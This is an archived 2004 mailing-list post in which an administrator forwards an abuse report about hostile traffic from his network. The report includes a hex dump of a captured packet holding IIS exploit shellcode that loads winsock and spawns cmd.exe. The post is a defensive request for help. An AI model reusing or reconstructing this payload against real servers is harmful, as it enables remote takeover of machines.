OT a little bit

• From: "Steve Moffat" <steve@xxxxxxxxxxxxxxxxxxxxxxxxxx>
• To: "Isa Weblist" <isalist@xxxxxxxxxxxxx>
• Date: Mon, 19 Jul 2004 22:05:04 +0100

Has anyone seen this before.

No virrii or trojans found on the affected network.

************************************************************************
***********************************
A user, apparently from your network, initiated a network connection to
a target computer that we manage.  We consider the network traffic
inappropriate or hostile.  The following data describes the network
traffic in question.

 

Times are in UTC.


[    2] Jul-19-2004 12:54:29 2004 UTC   207.228.141.50:2100 ->
172.15.23.10:443 TCP 326 bytes data

0000  80 62 01 02 bd 00 01 00  01 00 16 8f 82 01 00 00
b..............

0010  00 eb 0f 54 48 43 4f 57  4e 5a 49 49 53 21 32 5e
..THCOWNZIIS!2^

0020  be 98 eb 25 23 28 45 49  25 53 02 06 6c 59 6c 59
..%#(EI%S..lYlY

0030  f8 1d 9c de 8c d1 4c 70  d4 03 58 46 57 53 32 5f
.....Lp..XFWS2_

0040  33 32 2e 44 4c 4c 01 eb  05 e8 f9 ff ff ff 5d 83
32.DLL........].

0050  ed 2c 6a 30 59 64 8b 01  8b 40 0c 8b 70 1c ad 8b
,j0Yd...@..p...

0060  78 08 8d 5f 3c 8b 1b 01  fb 8b 5b 78 01 fb 8b 4b
x.._<.....[x...K

0070  1c 01 f9 8b 53 24 01 fa  53 51 52 8b 5b 20 01 fb    ....S$..SQR.[
.

0080  31 c9 41 31 c0 99 8b 34  8b 01 fe ac 31 c2 d1 e2
1.A1...4....1...

0090  84 c0 75 f7 0f b6 45 09  8d 44 45 08 66 39 10 75
.u...E..DE.f9.u

00a0  e1 66 31 10 5a 58 5e 56  50 52 2b 4e 10 41 0f b7
f1.ZX^VPR+N.A..

00b0  0c 4a 8b 04 88 01 f8 0f  b6 4d 09 89 44 8d d8 fe
J.......M..D...

00c0  4d 09 75 be fe 4d 08 74  17 fe 4d 24 8d 5d 1a 53
M.u..M.t..M$.].S

00d0  ff d0 89 c7 6a 02 58 88  45 09 80 45 79 0c eb 82
...j.X.E..Ey...

00e0  89 ce 31 db 53 53 53 53  56 46 56 ff d0 89 c7 55
.1.SSSSVFV....U

00f0  58 66 89 30 6a 10 55 57  ff 55 e0 8d 45 88 50 ff
Xf.0j.UW.U..E.P.

0100  55 e8 55 55 ff 55 ec 8d  44 05 0c 94 53 68 2e 65
U.UU.U..D...Sh.e

0110  78 65 68 5c 63 6d 64 94  31 d2 8d 45 cc 94 57 57
xeh\cmd.1..E..WW

0120  57 53 53 fe ca 01 f2 52  94 8d 45 78 50 8d 45 88
WSS....R..ExP.E.

0130  50 b1 08 53 53 6a 10 fe  ce 52 53 53 53 55 ff 55
P..SSj...RSSSU.U

0140  f0 6a ff ff 55 e4                                   j..U.


This E-Mail is confidential. It is not intended to be read, copied, disclosed 
or used by any person other than the recipient named above. 


Unauthorised use, disclosure, or copying is strictly prohibited and may be 
unlawful. Optimum IT Solutions disclaims any liability for any action taken in 
connection of this E-Mail. The comments or statements expressed in this E-Mail 
are not necessarily those of Optimum IT Solutions or its subsidiaries or 
affiliates.

administrator@xxxxxxxxxxxxxxxxxxxxxxxxxx 

Other related posts:

• » OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit
• » RE: OT a little bit

1. Home
2. isalist
3. Archive
4. 07-2004

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---